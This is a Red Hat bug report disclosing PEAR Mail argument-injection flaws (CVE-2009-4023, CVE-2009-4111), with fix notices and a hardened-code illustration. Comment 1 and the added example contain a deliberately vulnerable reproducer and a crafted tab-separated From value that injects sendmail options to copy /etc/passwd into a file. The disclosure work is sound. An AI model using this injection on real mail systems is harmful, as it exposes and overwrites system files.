Bug 540842 - (CVE-2009-4023, CVE-2009-4111) CVE-2009-4023 CVE-2009-4111 php-pear-Mail: Absent sanitization of mail header fields
Status: CLOSED ERRATA
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All    OS: Linux
Priority: high    Severity: high
Assigned To: Red Hat Product Security
URL: http://pear.php.net/bugs/bug.php?id=1...
Whiteboard: impact=important,source=osssecurity,r...
Keywords: Security
Depends On: 541964

Reported: 2009-11-24 05:37 EST by Jan Lieskovsky
Modified: 2010-12-21 17:04 EST
Doc Type: Bug Fix
Last Closed: 2010-12-21 17:04:57 EST

Description Jan Lieskovsky 2009-11-24 05:37:59 EST
PEAR's Mail class did not properly escape the content of mail header fields
when using the sendmail backend. A remote attacker could send an email
message with specially crafted headers to a local user, leading to
disclosure of content and potentially to modification of arbitrary
system files, once the email message was processed by PEAR's Mail
class.

References:
-----------
http://pear.php.net/bugs/bug.php?id=16200
http://bugs.debian.org/557121
http://secunia.com/advisories/37410/
http://www.debian.org/security/2009/dsa-1938

Upstream patch:
---------------
http://pear.php.net/bugs/bug.php?id=16200&edit=12&patch=quick-fix&revision=1241757412

Please pay attention also to comment:

[2009-11-21 08:19 UTC] rgeissert (Raphael Geissert)

which suggests the proposed patch might be incomplete.

CVE Request:
------------
http://www.openwall.com/lists/oss-security/2009/11/23/13
Comment 1 Jan Lieskovsky 2009-11-24 05:43:06 EST
Reproducer:
-----------
<?php
// Reproducer (deliberately vulnerable): the From header is built from
// unvalidated request input and handed to the PEAR Mail sendmail backend.
ini_set('include_path', ini_get('include_path') . ':/usr/local/lib/php/PEAR:');
require_once("Mail.php");

$from    = "From: " . $_REQUEST['email'] . "\r\n";  // attacker-controlled value
$to      = "xxxxxxx@zzzz.com";
$cc      = "";
$bcc     = "";
$subject = "subscription request";
$hdrs = array(
    "To"      => $to,
    "Cc"      => $cc,
    "Bcc"     => $bcc,
    "From"    => $from,
    "Subject" => $subject,
);
$body = "test";
$mail =& Mail::factory('sendmail');
$mail->send($to, $hdrs, $body);
?>

test.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3

Note: You might need to change the path to ':/usr/share/pear/:'.
      After this I can view the content of my /etc/passwd with
      some add-ons as /tmp/wokao.
Comment 2 Jan Lieskovsky 2009-11-24 05:44:54 EST
This issue affects the versions of the php-pear-Mail package, as shipped
with Fedora release of 10, 11, 12 and as shipped with Extra Packages
for Enterprise Linux 5 (EPEL-5) project.

Please fix.
Comment 3 Jan Lieskovsky 2009-11-25 03:44:16 EST
This is CVE-2009-4023.
Comment 5 Fedora Update System 2009-11-27 14:08:50 EST
php-pear-Mail-1.1.14-5.el5.1 has been submitted as an update for Fedora EPEL 5.
http://admin.fedoraproject.org/updates/php-pear-Mail-1.1.14-5.el5.1
Comment 6 Jan Lieskovsky 2009-11-29 11:36:45 EST
Common Vulnerabilities and Exposures assigned a separate identifier of CVE-2009-4111 for the missing sanitization of the $recipients header of php-pear-Mail:

Argument injection vulnerability in Mail/sendmail.php in the Mail
package 1.1.14, 1.2.0b2, and possibly other versions for PEAR allows
remote attackers to read and write arbitrary files via a crafted
$recipients parameter, and possibly other parameters, a different
vulnerability than CVE-2009-4023.

References:
-----------
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4111
http://www.openwall.com/lists/oss-security/2009/11/23/8
http://www.openwall.com/lists/oss-security/2009/11/28/2
http://pear.php.net/bugs/bug.php?id=16200
https://bugs.gentoo.org/show_bug.cgi?id=294256
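Added example (not code from this bug report, the upstream patch, or the PEAR Mail package) illustrating the argument-injection mechanism behind both identifiers: the From address used by the reproducer in Comment 1 (CVE-2009-4023) and the $recipients parameter named in the CVE-2009-4111 text above. A command string modelled on the backend's concatenation style is run with printf standing in for the sendmail binary, so the argv boundaries sendmail would see become visible, next to a hardened build that checks each address against an allow-list (an assumed policy for illustration, not the upstream fix) and quotes it with escapeshellarg(). The sendmail path, the recipient address and the allow-list pattern are assumptions.

```php
<?php
// Added example, not from the PEAR bug report or the PEAR Mail source.
// Shows why a tab-separated From address or recipient becomes extra
// sendmail options when the command line is built by concatenation and
// handed to a shell, and how validation plus escapeshellarg() prevents it.

const SENDMAIL = '/usr/sbin/sendmail';   // assumed path

// Crafted From value from the Comment 1 reproducer: the %09 bytes are tabs,
// which the shell treats as word separators, so -C and -X (sendmail's
// config-file and log-file options) arrive as separate arguments.
const CRAFTED_FROM = "xxxxx\t-C\t/etc/passwd\t-X\t/tmp/wokao\tzzz@x\t.com";

// Vulnerable pattern: attacker-influenced strings concatenated unquoted
// into a shell command line (modelled on the backend's style, not its code).
function build_vulnerable(string $from, string $recipients): string {
    return SENDMAIL . ' -f' . $from . ' -- ' . $recipients;
}

// Hardened pattern, step 1: refuse anything that is not a plain address.
// Assumption: this conservative allow-list is acceptable for the deployment.
function require_plain_address(string $addr): string {
    if (!preg_match('/^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/', $addr)) {
        throw new InvalidArgumentException('refusing unsafe address: ' . var_export($addr, true));
    }
    return $addr;
}

// Hardened pattern, step 2: quote every value so the shell passes each one
// to sendmail as exactly one argv entry, and pass recipients as a list.
function build_hardened(string $from, array $recipients): string {
    $cmd = SENDMAIL . ' -f' . escapeshellarg(require_plain_address($from)) . ' --';
    foreach ($recipients as $rcpt) {
        $cmd .= ' ' . escapeshellarg(require_plain_address($rcpt));
    }
    return $cmd;
}

// Replace the sendmail path with printf, which prints one bracketed line
// per argument it receives; this shows the argv split without sending mail.
function show_argv(string $cmd): string {
    $probe = "printf '[%s]\\n'" . substr($cmd, strlen(SENDMAIL));
    return (string) shell_exec($probe . ' 2>&1');
}

echo "vulnerable build, crafted From:\n";
echo show_argv(build_vulnerable(CRAFTED_FROM, 'victim@example.com'));

echo "hardened build, crafted From:\n";
try {
    build_hardened(CRAFTED_FROM, ['victim@example.com']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

echo "hardened build, legitimate From:\n";
echo show_argv(build_hardened('user@example.com', ['victim@example.com']));
```

In the vulnerable run the pieces separated by tabs each come out on their own line, i.e. sendmail would have received -C and -X as options; in the hardened run the From address stays inside a single -f argument and every recipient is one argv entry. Validation is kept separate from quoting on purpose: escapeshellarg() alone stops the shell split, but rejecting addresses that contain whitespace or option-looking tokens also catches the case where the backend is later changed to call sendmail without a shell at all.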
Comment 7 Fedora Update System 2009-11-30 23:20:46 EST
php-pear-Mail-1.1.14-5.fc11 has been pushed to the Fedora 11 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 8 Fedora Update System 2009-11-30 23:29:06 EST
php-pear-Mail-1.1.14-5.fc12 has been pushed to the Fedora 12 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 9 Fedora Update System 2009-11-30 23:41:35 EST
php-pear-Mail-1.1.14-5.fc10 has been pushed to the Fedora 10 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 10 Fedora Update System 2009-12-01 13:25:47 EST
php-pear-Mail-1.1.14-5.el5.1 has been pushed to the Fedora EPEL 5 stable repository.  If problems still persist, please make note of it in this bug report.
